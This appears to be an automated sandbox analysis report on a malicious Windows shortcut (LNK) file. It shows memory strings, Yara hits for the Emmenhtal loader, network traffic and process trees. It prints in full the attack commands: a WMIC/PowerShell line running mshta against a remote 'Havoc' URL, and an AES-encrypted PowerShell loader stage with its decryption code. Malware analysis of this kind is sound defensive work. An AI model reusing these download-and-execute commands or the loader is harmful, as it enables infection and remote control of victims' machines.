Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000008.00000003.2197751329.000001549C900000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2180956426.0000024DF141A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros
Source: mshta.exe, 00000006.00000002.2508410347.000002486536B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.0000024865368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.p
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pr
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro
Source: mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/
Source: mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/?P
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Fox/API
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Fox/API%20_Guide.pdf
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Q
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Qu
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Qua
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quan
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quant
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantu
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/X
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZ
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJ
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJK
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKP
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPU
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUB
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.m
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.ms
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.msi
Source: mshta.exe, 00000006.00000002.2508634004.0000024865690000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C06F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, GYede3Gwn0.lnkString found in binary or memory: https://vividpulse.pro/Seed/Havoc
Source: powershell.exeString found in binary or memory: https://vividpulse.pro/Seed/Havoc$global:?
Source: mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havoc)8x
Source: mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havoc...
Source: mshta.exe, 00000006.00000003.2486953315.0000025067F56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havoc...8j
Source: mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havoc1
Source: mshta.exe, 00000006.00000002.2508410347.000002486536B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.0000024865368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havoc9r
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocC
Source: mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506268055.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocC:
Source: mshta.exe, 00000006.00000002.2508719891.0000024866CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocH
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD96E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocP
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocV
Source: powershell.exe, 00000005.00000002.2176502931.0000024DD7560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocVBS;.VBE;.
Source: mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocW0
Source: mshta.exe, 00000006.00000003.2488150003.000002506C06F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavocYmsz9
Source: mshta.exe, 00000006.00000002.2510242583.000002506C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507575546.000002506C105000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488097868.000002506C104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/HavoccoLMEMHX
Source: mshta.exe, 00000006.00000003.2497045401.000002506DB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havochttps://vividpulse.pro/Seed/Havoc
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocl
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD9241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocp
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocq
Source: powershell.exe, 00000005.00000002.2174817634.0000024DD7392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocrs
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownHTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49731 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1], type: DROPPEDMatched rule: Emmenhtal Loader string Author: Sekoia.io
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000000.00000002.2150289412.000002B78BA2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')" memstr_a43211bc-c
Windows shortcut file (LNK) contains suspicious command line arguments
Source: GYede3Gwn0.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345416BF5_2_00007FFD345416BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454203D5_2_00007FFD3454203D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD331762A59_2_00007FFD331762A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD331762EC9_2_00007FFD331762EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD331729FA9_2_00007FFD331729FA
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2590
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2590Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1], type: DROPPEDMatched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912
Source: classification engineClassification label: mal100.evad.winLNK@28/62@2/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1ni4u3u.rn0.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: GYede3Gwn0.lnkReversingLabs: Detection: 18%
Source: GYede3Gwn0.lnkVirustotal: Detection: 25%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/HavocJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
